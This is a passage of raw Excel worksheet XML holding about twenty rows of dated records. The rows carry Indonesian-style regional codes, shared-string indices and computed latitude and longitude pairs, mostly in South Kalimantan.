      </c>
      <c r="X2659" t="s">
        <v>20577</v>
      </c>
      <c r="Y2659" t="str">
        <f t="shared" si="41"/>
        <v>-3.37994,114.60743</v>
      </c>
    </row>
    <row r="2660" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2660">
        <v>226321</v>
      </c>
      <c r="B2660" s="1">
        <v>44211</v>
      </c>
      <c r="C2660" s="2">
        <v>0.36484953703703704</v>
      </c>
      <c r="D2660" t="s">
        <v>22</v>
      </c>
      <c r="E2660" t="s">
        <v>23</v>
      </c>
      <c r="F2660" t="s">
        <v>8993</v>
      </c>
      <c r="G2660" t="s">
        <v>8994</v>
      </c>
      <c r="H2660" t="s">
        <v>26</v>
      </c>
      <c r="I2660" t="s">
        <v>111</v>
      </c>
      <c r="J2660" t="s">
        <v>6509</v>
      </c>
      <c r="L2660" t="s">
        <v>8995</v>
      </c>
      <c r="M2660">
        <v>6305050006</v>
      </c>
      <c r="N2660">
        <v>6305050</v>
      </c>
      <c r="O2660">
        <v>6305</v>
      </c>
      <c r="P2660">
        <v>63</v>
      </c>
      <c r="Q2660" t="s">
        <v>8837</v>
      </c>
      <c r="R2660" t="s">
        <v>8838</v>
      </c>
      <c r="S2660" t="s">
        <v>8839</v>
      </c>
      <c r="T2660" t="s">
        <v>6513</v>
      </c>
      <c r="U2660" s="5">
        <v>11537007</v>
      </c>
      <c r="V2660" s="5" t="s">
        <v>16797</v>
      </c>
      <c r="W2660" s="5">
        <v>-292857</v>
      </c>
      <c r="X2660" t="s">
        <v>20537</v>
      </c>
      <c r="Y2660" t="str">
        <f t="shared" si="41"/>
        <v>-2.92857,115.37007</v>
      </c>
    </row>
    <row r="2661" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2661">
        <v>226322</v>
      </c>
      <c r="B2661" s="1">
        <v>44211</v>
      </c>
      <c r="C2661" s="2">
        <v>0.37685185185185183</v>
      </c>
      <c r="D2661" t="s">
        <v>22</v>
      </c>
      <c r="E2661" t="s">
        <v>23</v>
      </c>
      <c r="F2661" t="s">
        <v>8996</v>
      </c>
      <c r="H2661" t="s">
        <v>26</v>
      </c>
      <c r="I2661" t="s">
        <v>1005</v>
      </c>
      <c r="J2661" t="s">
        <v>6509</v>
      </c>
      <c r="L2661" t="s">
        <v>8997</v>
      </c>
      <c r="M2661">
        <v>6371020013</v>
      </c>
      <c r="N2661">
        <v>6371020</v>
      </c>
      <c r="O2661">
        <v>6371</v>
      </c>
      <c r="P2661">
        <v>63</v>
      </c>
      <c r="Q2661" t="s">
        <v>8998</v>
      </c>
      <c r="R2661" t="s">
        <v>8795</v>
      </c>
      <c r="S2661" t="s">
        <v>6512</v>
      </c>
      <c r="T2661" t="s">
        <v>6513</v>
      </c>
      <c r="U2661" s="5">
        <v>11461456</v>
      </c>
      <c r="V2661" s="5" t="s">
        <v>16838</v>
      </c>
      <c r="W2661" s="5">
        <v>-331045</v>
      </c>
      <c r="X2661" t="s">
        <v>20578</v>
      </c>
      <c r="Y2661" t="str">
        <f t="shared" si="41"/>
        <v>-3.31045,114.61456</v>
      </c>
    </row>
    <row r="2662" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2662">
        <v>226323</v>
      </c>
      <c r="B2662" s="1">
        <v>44211</v>
      </c>
      <c r="C2662" s="2">
        <v>0.38583333333333331</v>
      </c>
      <c r="D2662" t="s">
        <v>22</v>
      </c>
      <c r="E2662" t="s">
        <v>23</v>
      </c>
      <c r="F2662" t="s">
        <v>8999</v>
      </c>
      <c r="G2662" t="s">
        <v>9000</v>
      </c>
      <c r="H2662" t="s">
        <v>26</v>
      </c>
      <c r="I2662" t="s">
        <v>9001</v>
      </c>
      <c r="J2662" t="s">
        <v>6509</v>
      </c>
      <c r="L2662" t="s">
        <v>9002</v>
      </c>
      <c r="M2662">
        <v>6303052011</v>
      </c>
      <c r="N2662">
        <v>6303052</v>
      </c>
      <c r="O2662">
        <v>6303</v>
      </c>
      <c r="P2662">
        <v>63</v>
      </c>
      <c r="Q2662" t="s">
        <v>9003</v>
      </c>
      <c r="R2662" t="s">
        <v>9004</v>
      </c>
      <c r="S2662" t="s">
        <v>8751</v>
      </c>
      <c r="T2662" t="s">
        <v>6513</v>
      </c>
      <c r="U2662" s="5">
        <v>11480085</v>
      </c>
      <c r="V2662" s="5" t="s">
        <v>16839</v>
      </c>
      <c r="W2662" s="5">
        <v>-328476</v>
      </c>
      <c r="X2662" t="s">
        <v>20579</v>
      </c>
      <c r="Y2662" t="str">
        <f t="shared" si="41"/>
        <v>-3.28476,114.80085</v>
      </c>
    </row>
    <row r="2663" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2663">
        <v>226324</v>
      </c>
      <c r="B2663" s="1">
        <v>44211</v>
      </c>
      <c r="C2663" s="2">
        <v>0.40729166666666666</v>
      </c>
      <c r="D2663" t="s">
        <v>22</v>
      </c>
      <c r="E2663" t="s">
        <v>23</v>
      </c>
      <c r="F2663" t="s">
        <v>9005</v>
      </c>
      <c r="G2663" t="s">
        <v>9006</v>
      </c>
      <c r="H2663" t="s">
        <v>26</v>
      </c>
      <c r="I2663" t="s">
        <v>137</v>
      </c>
      <c r="J2663" t="s">
        <v>6509</v>
      </c>
      <c r="L2663" t="s">
        <v>9007</v>
      </c>
      <c r="M2663">
        <v>6371020004</v>
      </c>
      <c r="N2663">
        <v>6371020</v>
      </c>
      <c r="O2663">
        <v>6371</v>
      </c>
      <c r="P2663">
        <v>63</v>
      </c>
      <c r="Q2663" t="s">
        <v>8808</v>
      </c>
      <c r="R2663" t="s">
        <v>8795</v>
      </c>
      <c r="S2663" t="s">
        <v>6512</v>
      </c>
      <c r="T2663" t="s">
        <v>6513</v>
      </c>
      <c r="U2663" s="5">
        <v>11463276</v>
      </c>
      <c r="V2663" s="5" t="s">
        <v>16840</v>
      </c>
      <c r="W2663" s="5">
        <v>-332812</v>
      </c>
      <c r="X2663" t="s">
        <v>20580</v>
      </c>
      <c r="Y2663" t="str">
        <f t="shared" si="41"/>
        <v>-3.32812,114.63276</v>
      </c>
    </row>
    <row r="2664" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2664">
        <v>226325</v>
      </c>
      <c r="B2664" s="1">
        <v>44211</v>
      </c>
      <c r="C2664" s="2">
        <v>0.40990740740740739</v>
      </c>
      <c r="D2664" t="s">
        <v>22</v>
      </c>
      <c r="E2664" t="s">
        <v>23</v>
      </c>
      <c r="F2664" t="s">
        <v>9008</v>
      </c>
      <c r="H2664" t="s">
        <v>26</v>
      </c>
      <c r="I2664" t="s">
        <v>6385</v>
      </c>
      <c r="J2664" t="s">
        <v>6509</v>
      </c>
      <c r="L2664" t="s">
        <v>9009</v>
      </c>
      <c r="M2664">
        <v>6301060016</v>
      </c>
      <c r="N2664">
        <v>6301060</v>
      </c>
      <c r="O2664">
        <v>6301</v>
      </c>
      <c r="P2664">
        <v>63</v>
      </c>
      <c r="Q2664" t="s">
        <v>7536</v>
      </c>
      <c r="R2664" t="s">
        <v>7536</v>
      </c>
      <c r="S2664" t="s">
        <v>7537</v>
      </c>
      <c r="T2664" t="s">
        <v>6513</v>
      </c>
      <c r="U2664" s="5">
        <v>11476730</v>
      </c>
      <c r="V2664" s="5" t="s">
        <v>16841</v>
      </c>
      <c r="W2664" s="5">
        <v>-380221</v>
      </c>
      <c r="X2664" t="s">
        <v>20581</v>
      </c>
      <c r="Y2664" t="str">
        <f t="shared" si="41"/>
        <v>-3.80221,114.76730</v>
      </c>
    </row>
    <row r="2665" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2665">
        <v>226326</v>
      </c>
      <c r="B2665" s="1">
        <v>44211</v>
      </c>
      <c r="C2665" s="2">
        <v>0.42347222222222225</v>
      </c>
      <c r="D2665" t="s">
        <v>22</v>
      </c>
      <c r="E2665" t="s">
        <v>23</v>
      </c>
      <c r="F2665" t="s">
        <v>9010</v>
      </c>
      <c r="G2665" t="s">
        <v>9011</v>
      </c>
      <c r="H2665" t="s">
        <v>26</v>
      </c>
      <c r="I2665" t="s">
        <v>3704</v>
      </c>
      <c r="J2665" t="s">
        <v>6509</v>
      </c>
      <c r="L2665" t="s">
        <v>9012</v>
      </c>
      <c r="M2665">
        <v>6307050005</v>
      </c>
      <c r="N2665">
        <v>6307050</v>
      </c>
      <c r="O2665">
        <v>6307</v>
      </c>
      <c r="P2665">
        <v>63</v>
      </c>
      <c r="Q2665" t="s">
        <v>9013</v>
      </c>
      <c r="R2665" t="s">
        <v>8817</v>
      </c>
      <c r="S2665" t="s">
        <v>8818</v>
      </c>
      <c r="T2665" t="s">
        <v>6513</v>
      </c>
      <c r="U2665" s="5">
        <v>11537731</v>
      </c>
      <c r="V2665" s="5" t="s">
        <v>16842</v>
      </c>
      <c r="W2665" s="5">
        <v>-259207</v>
      </c>
      <c r="X2665" t="s">
        <v>20582</v>
      </c>
      <c r="Y2665" t="str">
        <f t="shared" si="41"/>
        <v>-2.59207,115.37731</v>
      </c>
    </row>
    <row r="2666" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2666">
        <v>226327</v>
      </c>
      <c r="B2666" s="1">
        <v>44211</v>
      </c>
      <c r="C2666" s="2">
        <v>0.43111111111111117</v>
      </c>
      <c r="D2666" t="s">
        <v>22</v>
      </c>
      <c r="E2666" t="s">
        <v>23</v>
      </c>
      <c r="F2666" t="s">
        <v>9014</v>
      </c>
      <c r="G2666" t="s">
        <v>9015</v>
      </c>
      <c r="H2666" t="s">
        <v>26</v>
      </c>
      <c r="I2666" t="s">
        <v>592</v>
      </c>
      <c r="J2666" t="s">
        <v>6509</v>
      </c>
      <c r="L2666" t="s">
        <v>9016</v>
      </c>
      <c r="M2666">
        <v>6304060007</v>
      </c>
      <c r="N2666">
        <v>6304060</v>
      </c>
      <c r="O2666">
        <v>6304</v>
      </c>
      <c r="P2666">
        <v>63</v>
      </c>
      <c r="Q2666" t="s">
        <v>8849</v>
      </c>
      <c r="R2666" t="s">
        <v>8850</v>
      </c>
      <c r="S2666" t="s">
        <v>8851</v>
      </c>
      <c r="T2666" t="s">
        <v>6513</v>
      </c>
      <c r="U2666" s="5">
        <v>11460622</v>
      </c>
      <c r="V2666" s="5" t="s">
        <v>16843</v>
      </c>
      <c r="W2666" s="5">
        <v>-326121</v>
      </c>
      <c r="X2666" t="s">
        <v>20583</v>
      </c>
      <c r="Y2666" t="str">
        <f t="shared" si="41"/>
        <v>-3.26121,114.60622</v>
      </c>
    </row>
    <row r="2667" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2667">
        <v>226328</v>
      </c>
      <c r="B2667" s="1">
        <v>44211</v>
      </c>
      <c r="C2667" s="2">
        <v>0.44453703703703701</v>
      </c>
      <c r="D2667" t="s">
        <v>22</v>
      </c>
      <c r="E2667" t="s">
        <v>23</v>
      </c>
      <c r="F2667" t="s">
        <v>9017</v>
      </c>
      <c r="G2667" t="s">
        <v>9018</v>
      </c>
      <c r="H2667" t="s">
        <v>26</v>
      </c>
      <c r="I2667" t="s">
        <v>1498</v>
      </c>
      <c r="J2667" t="s">
        <v>6509</v>
      </c>
      <c r="L2667" t="s">
        <v>9019</v>
      </c>
      <c r="M2667">
        <v>6303040001</v>
      </c>
      <c r="N2667">
        <v>6303040</v>
      </c>
      <c r="O2667">
        <v>6303</v>
      </c>
      <c r="P2667">
        <v>63</v>
      </c>
      <c r="Q2667" t="s">
        <v>8808</v>
      </c>
      <c r="R2667" t="s">
        <v>8809</v>
      </c>
      <c r="S2667" t="s">
        <v>8751</v>
      </c>
      <c r="T2667" t="s">
        <v>6513</v>
      </c>
      <c r="U2667" s="5">
        <v>11463162</v>
      </c>
      <c r="V2667" s="5" t="s">
        <v>16844</v>
      </c>
      <c r="W2667" s="5">
        <v>-331593</v>
      </c>
      <c r="X2667" t="s">
        <v>20584</v>
      </c>
      <c r="Y2667" t="str">
        <f t="shared" si="41"/>
        <v>-3.31593,114.63162</v>
      </c>
    </row>
    <row r="2668" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2668">
        <v>226329</v>
      </c>
      <c r="B2668" s="1">
        <v>44211</v>
      </c>
      <c r="C2668" s="2">
        <v>0.44872685185185185</v>
      </c>
      <c r="D2668" t="s">
        <v>22</v>
      </c>
      <c r="E2668" t="s">
        <v>23</v>
      </c>
      <c r="F2668" t="s">
        <v>9020</v>
      </c>
      <c r="H2668" t="s">
        <v>26</v>
      </c>
      <c r="I2668" t="s">
        <v>3069</v>
      </c>
      <c r="J2668" t="s">
        <v>6509</v>
      </c>
      <c r="L2668" t="s">
        <v>9021</v>
      </c>
      <c r="M2668">
        <v>6305050006</v>
      </c>
      <c r="N2668">
        <v>6305050</v>
      </c>
      <c r="O2668">
        <v>6305</v>
      </c>
      <c r="P2668">
        <v>63</v>
      </c>
      <c r="Q2668" t="s">
        <v>8837</v>
      </c>
      <c r="R2668" t="s">
        <v>8838</v>
      </c>
      <c r="S2668" t="s">
        <v>8839</v>
      </c>
      <c r="T2668" t="s">
        <v>6513</v>
      </c>
      <c r="U2668" s="5">
        <v>11537007</v>
      </c>
      <c r="V2668" s="5" t="s">
        <v>16797</v>
      </c>
      <c r="W2668" s="5">
        <v>-292857</v>
      </c>
      <c r="X2668" t="s">
        <v>20537</v>
      </c>
      <c r="Y2668" t="str">
        <f t="shared" si="41"/>
        <v>-2.92857,115.37007</v>
      </c>
    </row>
    <row r="2669" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2669">
        <v>226331</v>
      </c>
      <c r="B2669" s="1">
        <v>44211</v>
      </c>
      <c r="C2669" s="2">
        <v>0.46012731481481484</v>
      </c>
      <c r="D2669" t="s">
        <v>22</v>
      </c>
      <c r="E2669" t="s">
        <v>23</v>
      </c>
      <c r="F2669" t="s">
        <v>9022</v>
      </c>
      <c r="G2669" t="s">
        <v>9023</v>
      </c>
      <c r="H2669" t="s">
        <v>26</v>
      </c>
      <c r="I2669" t="s">
        <v>1359</v>
      </c>
      <c r="J2669" t="s">
        <v>6509</v>
      </c>
      <c r="L2669" t="s">
        <v>9024</v>
      </c>
      <c r="M2669">
        <v>6371010008</v>
      </c>
      <c r="N2669">
        <v>6371010</v>
      </c>
      <c r="O2669">
        <v>6371</v>
      </c>
      <c r="P2669">
        <v>63</v>
      </c>
      <c r="Q2669" t="s">
        <v>8908</v>
      </c>
      <c r="R2669" t="s">
        <v>6511</v>
      </c>
      <c r="S2669" t="s">
        <v>6512</v>
      </c>
      <c r="T2669" t="s">
        <v>6513</v>
      </c>
      <c r="U2669" s="5">
        <v>11460944</v>
      </c>
      <c r="V2669" s="5" t="s">
        <v>16845</v>
      </c>
      <c r="W2669" s="5">
        <v>-334285</v>
      </c>
      <c r="X2669" t="s">
        <v>20585</v>
      </c>
      <c r="Y2669" t="str">
        <f t="shared" si="41"/>
        <v>-3.34285,114.60944</v>
      </c>
    </row>
    <row r="2670" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2670">
        <v>226332</v>
      </c>
      <c r="B2670" s="1">
        <v>44211</v>
      </c>
      <c r="C2670" s="2">
        <v>0.46863425925925922</v>
      </c>
      <c r="D2670" t="s">
        <v>22</v>
      </c>
      <c r="E2670" t="s">
        <v>23</v>
      </c>
      <c r="F2670" t="s">
        <v>9025</v>
      </c>
      <c r="G2670" t="s">
        <v>9026</v>
      </c>
      <c r="H2670" t="s">
        <v>26</v>
      </c>
      <c r="I2670" t="s">
        <v>9027</v>
      </c>
      <c r="J2670" t="s">
        <v>6509</v>
      </c>
      <c r="L2670" t="s">
        <v>9028</v>
      </c>
      <c r="M2670">
        <v>6303050003</v>
      </c>
      <c r="N2670">
        <v>6303050</v>
      </c>
      <c r="O2670">
        <v>6303</v>
      </c>
      <c r="P2670">
        <v>63</v>
      </c>
      <c r="Q2670" t="s">
        <v>8925</v>
      </c>
      <c r="R2670" t="s">
        <v>8759</v>
      </c>
      <c r="S2670" t="s">
        <v>8751</v>
      </c>
      <c r="T2670" t="s">
        <v>6513</v>
      </c>
      <c r="U2670" s="5">
        <v>11486735</v>
      </c>
      <c r="V2670" s="5" t="s">
        <v>16846</v>
      </c>
      <c r="W2670" s="5">
        <v>-342192</v>
      </c>
      <c r="X2670" t="s">
        <v>20586</v>
      </c>
      <c r="Y2670" t="str">
        <f t="shared" si="41"/>
        <v>-3.42192,114.86735</v>
      </c>
    </row>
    <row r="2671" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2671">
        <v>226333</v>
      </c>
      <c r="B2671" s="1">
        <v>44211</v>
      </c>
      <c r="C2671" s="2">
        <v>0.47116898148148145</v>
      </c>
      <c r="D2671" t="s">
        <v>22</v>
      </c>
      <c r="E2671" t="s">
        <v>23</v>
      </c>
      <c r="F2671" t="s">
        <v>9029</v>
      </c>
      <c r="G2671" t="s">
        <v>9030</v>
      </c>
      <c r="H2671" t="s">
        <v>26</v>
      </c>
      <c r="I2671" t="s">
        <v>1651</v>
      </c>
      <c r="J2671" t="s">
        <v>6509</v>
      </c>
      <c r="L2671" t="s">
        <v>9031</v>
      </c>
      <c r="M2671">
        <v>6371010009</v>
      </c>
      <c r="N2671">
        <v>6371010</v>
      </c>
      <c r="O2671">
        <v>6371</v>
      </c>
      <c r="P2671">
        <v>63</v>
      </c>
      <c r="Q2671" t="s">
        <v>9032</v>
      </c>
      <c r="R2671" t="s">
        <v>6511</v>
      </c>
      <c r="S2671" t="s">
        <v>6512</v>
      </c>
      <c r="T2671" t="s">
        <v>6513</v>
      </c>
      <c r="U2671" s="5">
        <v>11459998</v>
      </c>
      <c r="V2671" s="5" t="s">
        <v>16847</v>
      </c>
      <c r="W2671" s="5">
        <v>-334271</v>
      </c>
      <c r="X2671" t="s">
        <v>20587</v>
      </c>
      <c r="Y2671" t="str">
        <f t="shared" si="41"/>
        <v>-3.34271,114.59998</v>
      </c>
    </row>
    <row r="2672" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2672">
        <v>226334</v>
      </c>
      <c r="B2672" s="1">
        <v>44211</v>
      </c>
      <c r="C2672" s="2">
        <v>0.47127314814814819</v>
      </c>
      <c r="D2672" t="s">
        <v>22</v>
      </c>
      <c r="E2672" t="s">
        <v>23</v>
      </c>
      <c r="F2672" t="s">
        <v>9033</v>
      </c>
      <c r="H2672" t="s">
        <v>26</v>
      </c>
      <c r="I2672" t="s">
        <v>7487</v>
      </c>
      <c r="J2672" t="s">
        <v>6509</v>
      </c>
      <c r="L2672" t="s">
        <v>9034</v>
      </c>
      <c r="M2672">
        <v>6305050006</v>
      </c>
      <c r="N2672">
        <v>6305050</v>
      </c>
      <c r="O2672">
        <v>6305</v>
      </c>
      <c r="P2672">
        <v>63</v>
      </c>
      <c r="Q2672" t="s">
        <v>8837</v>
      </c>
      <c r="R2672" t="s">
        <v>8838</v>
      </c>
      <c r="S2672" t="s">
        <v>8839</v>
      </c>
      <c r="T2672" t="s">
        <v>6513</v>
      </c>
      <c r="U2672" s="5">
        <v>11537099</v>
      </c>
      <c r="V2672" s="5" t="s">
        <v>16848</v>
      </c>
      <c r="W2672" s="5">
        <v>-292629</v>
      </c>
      <c r="X2672" t="s">
        <v>20588</v>
      </c>
      <c r="Y2672" t="str">
        <f t="shared" si="41"/>
        <v>-2.92629,115.37099</v>
      </c>
    </row>
    <row r="2673" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2673">
        <v>226335</v>
      </c>
      <c r="B2673" s="1">
        <v>44211</v>
      </c>
      <c r="C2673" s="2">
        <v>0.47618055555555555</v>
      </c>
      <c r="D2673" t="s">
        <v>22</v>
      </c>
      <c r="E2673" t="s">
        <v>23</v>
      </c>
      <c r="F2673" t="s">
        <v>9035</v>
      </c>
      <c r="G2673" t="s">
        <v>9036</v>
      </c>
      <c r="H2673" t="s">
        <v>26</v>
      </c>
      <c r="I2673" t="s">
        <v>1394</v>
      </c>
      <c r="J2673" t="s">
        <v>6509</v>
      </c>
      <c r="L2673" t="s">
        <v>9037</v>
      </c>
      <c r="M2673">
        <v>6372020002</v>
      </c>
      <c r="N2673">
        <v>6372020</v>
      </c>
      <c r="O2673">
        <v>6372</v>
      </c>
      <c r="P2673">
        <v>63</v>
      </c>
      <c r="Q2673" t="s">
        <v>9038</v>
      </c>
      <c r="R2673" t="s">
        <v>9039</v>
      </c>
      <c r="S2673" t="s">
        <v>8778</v>
      </c>
      <c r="T2673" t="s">
        <v>6513</v>
      </c>
      <c r="U2673" s="5">
        <v>11485260</v>
      </c>
      <c r="V2673" s="5" t="s">
        <v>16849</v>
      </c>
      <c r="W2673" s="5">
        <v>-348237</v>
      </c>
      <c r="X2673" t="s">
        <v>20589</v>
      </c>
      <c r="Y2673" t="str">
        <f t="shared" si="41"/>
        <v>-3.48237,114.85260</v>
      </c>
    </row>
    <row r="2674" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2674">
        <v>226336</v>
      </c>
      <c r="B2674" s="1">
        <v>44211</v>
      </c>
      <c r="C2674" s="2">
        <v>0.48576388888888888</v>
      </c>
      <c r="D2674" t="s">
        <v>22</v>
      </c>
      <c r="E2674" t="s">
        <v>23</v>
      </c>
      <c r="F2674" t="s">
        <v>9040</v>
      </c>
      <c r="G2674" t="s">
        <v>9041</v>
      </c>
      <c r="H2674" t="s">
        <v>26</v>
      </c>
      <c r="I2674" t="s">
        <v>193</v>
      </c>
      <c r="J2674" t="s">
        <v>6509</v>
      </c>
      <c r="L2674" t="s">
        <v>9042</v>
      </c>
      <c r="M2674">
        <v>6311050014</v>
      </c>
      <c r="N2674">
        <v>6311050</v>
      </c>
      <c r="O2674">
        <v>6311</v>
      </c>
      <c r="P2674">
        <v>63</v>
      </c>
      <c r="Q2674" t="s">
        <v>8933</v>
      </c>
      <c r="R2674" t="s">
        <v>8896</v>
      </c>
      <c r="S2674" t="s">
        <v>8934</v>
      </c>
      <c r="T2674" t="s">
        <v>6513</v>
      </c>
      <c r="U2674" s="5">
        <v>11554504</v>
      </c>
      <c r="V2674" s="5" t="s">
        <v>16850</v>
      </c>
      <c r="W2674" s="5">
        <v>-228200</v>
      </c>
      <c r="X2674" t="s">
        <v>20590</v>
      </c>
      <c r="Y2674" t="str">
        <f t="shared" si="41"/>
        <v>-2.28200,115.54504</v>
      </c>
    </row>
    <row r="2675" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2675">
        <v>226337</v>
      </c>
      <c r="B2675" s="1">
        <v>44211</v>
      </c>
      <c r="C2675" s="2">
        <v>0.49967592592592597</v>
      </c>
      <c r="D2675" t="s">
        <v>22</v>
      </c>
      <c r="E2675" t="s">
        <v>23</v>
      </c>
      <c r="F2675" t="s">
        <v>9043</v>
      </c>
      <c r="G2675" t="s">
        <v>9044</v>
      </c>
      <c r="H2675" t="s">
        <v>26</v>
      </c>
      <c r="I2675" t="s">
        <v>9045</v>
      </c>
      <c r="J2675" t="s">
        <v>6509</v>
      </c>
      <c r="L2675" t="s">
        <v>9046</v>
      </c>
      <c r="M2675">
        <v>6303100003</v>
      </c>
      <c r="N2675">
        <v>6303100</v>
      </c>
      <c r="O2675">
        <v>6303</v>
      </c>
      <c r="P2675">
        <v>63</v>
      </c>
      <c r="Q2675" t="s">
        <v>9047</v>
      </c>
      <c r="R2675" t="s">
        <v>9048</v>
      </c>
      <c r="S2675" t="s">
        <v>8751</v>
      </c>
      <c r="T2675" t="s">
        <v>6513</v>
      </c>
      <c r="U2675" s="5">
        <v>11510374</v>
      </c>
      <c r="V2675" s="5" t="s">
        <v>16851</v>
      </c>
      <c r="W2675" s="5">
        <v>-329910</v>
      </c>
      <c r="X2675" t="s">
        <v>20591</v>
      </c>
      <c r="Y2675" t="str">
        <f t="shared" si="41"/>
        <v>-3.29910,115.10374</v>
      </c>
    </row>
    <row r="2676" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2676">
        <v>226338</v>
      </c>
      <c r="B2676" s="1">
        <v>44211</v>
      </c>
      <c r="C2676" s="2">
        <v>0.50079861111111112</v>
      </c>
      <c r="D2676" t="s">
        <v>22</v>
      </c>
      <c r="E2676" t="s">
        <v>23</v>
      </c>
      <c r="F2676" t="s">
        <v>9049</v>
      </c>
      <c r="G2676" t="s">
        <v>9050</v>
      </c>
      <c r="H2676" t="s">
        <v>26</v>
      </c>
      <c r="I2676" t="s">
        <v>3704</v>
      </c>
      <c r="J2676" t="s">
        <v>7678</v>
      </c>
      <c r="L2676" t="s">
        <v>9051</v>
      </c>
      <c r="M2676">
        <v>7204041008</v>
      </c>
      <c r="N2676">
        <v>7204041</v>
      </c>
      <c r="O2676">
        <v>7204</v>
      </c>
      <c r="P2676">
        <v>72</v>
      </c>
      <c r="Q2676" t="s">
        <v>9052</v>
      </c>
      <c r="R2676" t="s">
        <v>9053</v>
      </c>
      <c r="S2676" t="s">
        <v>9054</v>
      </c>
      <c r="T2676" t="s">
        <v>7683</v>
      </c>
      <c r="U2676" s="5">
        <v>12018342</v>
      </c>
      <c r="V2676" s="5" t="s">
        <v>16852</v>
      </c>
      <c r="W2676" s="5">
        <v>-156177</v>
      </c>
      <c r="X2676" t="s">
        <v>20592</v>
      </c>
      <c r="Y2676" t="str">
        <f t="shared" si="41"/>
        <v>-1.56177,120.18342</v>
      </c>
    </row>
    <row r="2677" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2677">
        <v>226339</v>
      </c>
      <c r="B2677" s="1">
        <v>44211</v>
      </c>
      <c r="C2677" s="2">
        <v>0.50577546296296294</v>
      </c>
      <c r="D2677" t="s">
        <v>22</v>
      </c>
      <c r="E2677" t="s">
        <v>23</v>
      </c>
      <c r="F2677" t="s">
        <v>9055</v>
      </c>
      <c r="G2677" t="s">
        <v>9056</v>
      </c>
      <c r="H2677" t="s">
        <v>26</v>
      </c>
      <c r="I2677" t="s">
        <v>7646</v>
      </c>
      <c r="J2677" t="s">
        <v>6509</v>
      </c>
      <c r="L2677" t="s">
        <v>9057</v>
      </c>
      <c r="M2677">
        <v>6307050008</v>
      </c>
      <c r="N2677">
        <v>6307050</v>
      </c>
      <c r="O2677">
        <v>6307</v>
      </c>
      <c r="P2677">
        <v>63</v>
      </c>
      <c r="Q2677" t="s">
        <v>8816</v>
      </c>
      <c r="R2677" t="s">
        <v>8817</v>
      </c>
      <c r="S2677" t="s">
        <v>8818</v>
      </c>
      <c r="T2677" t="s">
        <v>6513</v>
      </c>
      <c r="U2677" s="5">
        <v>11538425</v>
      </c>
      <c r="V2677" s="5" t="s">
        <v>16853</v>
      </c>
      <c r="W2677" s="5">
        <v>-258770</v>
      </c>
      <c r="X2677" t="s">
        <v>20593</v>
      </c>
      <c r="Y2677" t="str">
        <f t="shared" si="41"/>
        <v>-2.58770,115.38425</v>
      </c>
    </row>
    <row r="2678" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2678">
        <v>226340</v>
      </c>
      <c r="B2678" s="1">
        <v>44211</v>
      </c>
      <c r="C2678" s="2">
        <v>0.51407407407407402</v>
      </c>
      <c r="D2678" t="s">
        <v>22</v>
      </c>
      <c r="E2678" t="s">
        <v>23</v>
      </c>
      <c r="F2678" t="s">
        <v>9058</v>
      </c>
      <c r="G2678" t="s">
        <v>9059</v>
      </c>
      <c r="H2678" t="s">
        <v>26</v>
      </c>
      <c r="I2678" t="s">
        <v>1136</v>
      </c>
      <c r="J2678" t="s">
        <v>6509</v>
      </c>
      <c r="L2678" t="s">
        <v>9060</v>
      </c>
      <c r="M2678">
        <v>6371031009</v>
      </c>
      <c r="N2678">
        <v>6371031</v>
      </c>
      <c r="O2678">
        <v>6371</v>
      </c>
      <c r="P2678">
        <v>63</v>
      </c>
      <c r="Q2678" t="s">
        <v>9061</v>
      </c>
      <c r="R2678" t="s">
        <v>8828</v>
      </c>
      <c r="S2678" t="s">
        <v>6512</v>
      </c>
      <c r="T2678" t="s">
        <v>6513</v>
      </c>
      <c r="U2678" s="5">
        <v>11459219</v>
      </c>
      <c r="V2678" s="5" t="s">
        <v>16854</v>
      </c>
      <c r="W2678" s="5">
        <v>-331837</v>
      </c>
      <c r="X2678" t="s">
        <v>20594</v>
      </c>
      <c r="Y2678" t="str">
        <f t="shared" si="41"/>
        <v>-3.31837,114.59219</v>
      </c>
    </row>
    <row r="2679" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2679">
        <v>226341</v>
      </c>
      <c r="B2679" s="1">
        <v>44211</v>
      </c>
      <c r="C2679" s="2">
        <v>0.51627314814814818</v>
      </c>
      <c r="D2679" t="s">
        <v>22</v>
      </c>
      <c r="E2679" t="s">
        <v>23</v>
      </c>
      <c r="F2679" t="s">
        <v>9062</v>
      </c>
      <c r="H2679" t="s">
        <v>26</v>
      </c>
      <c r="I2679" t="s">
        <v>5397</v>
      </c>
      <c r="J2679" t="s">
        <v>6509</v>
      </c>
      <c r="L2679" t="s">
        <v>9063</v>
      </c>
      <c r="M2679">
        <v>6307050007</v>
      </c>
      <c r="N2679">
        <v>6307050</v>
      </c>
      <c r="O2679">
        <v>6307</v>
      </c>
      <c r="P2679">
        <v>63</v>
      </c>
      <c r="Q2679" t="s">
        <v>8823</v>
      </c>
      <c r="R2679" t="s">
        <v>8817</v>
      </c>
      <c r="S2679" t="s">
        <v>8818</v>
      </c>
      <c r="T2679" t="s">
        <v>6513</v>
      </c>
      <c r="U2679" s="5">
        <v>11538405</v>
      </c>
      <c r="V2679" s="5" t="s">
        <v>16855</v>
      </c>
      <c r="W2679" s="5">
        <v>-258572</v>
      </c>
      <c r="X2679" t="s">
        <v>20595</v>
      </c>
      <c r="Y2679" t="str">
        <f t="shared" si="41"/>
        <v>-2.58572,115.38405</v>
      </c>
    </row>
    <row r="2680" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2680">
        <v>226342</v>
      </c>
      <c r="B2680" s="1">
        <v>44211</v>
      </c>
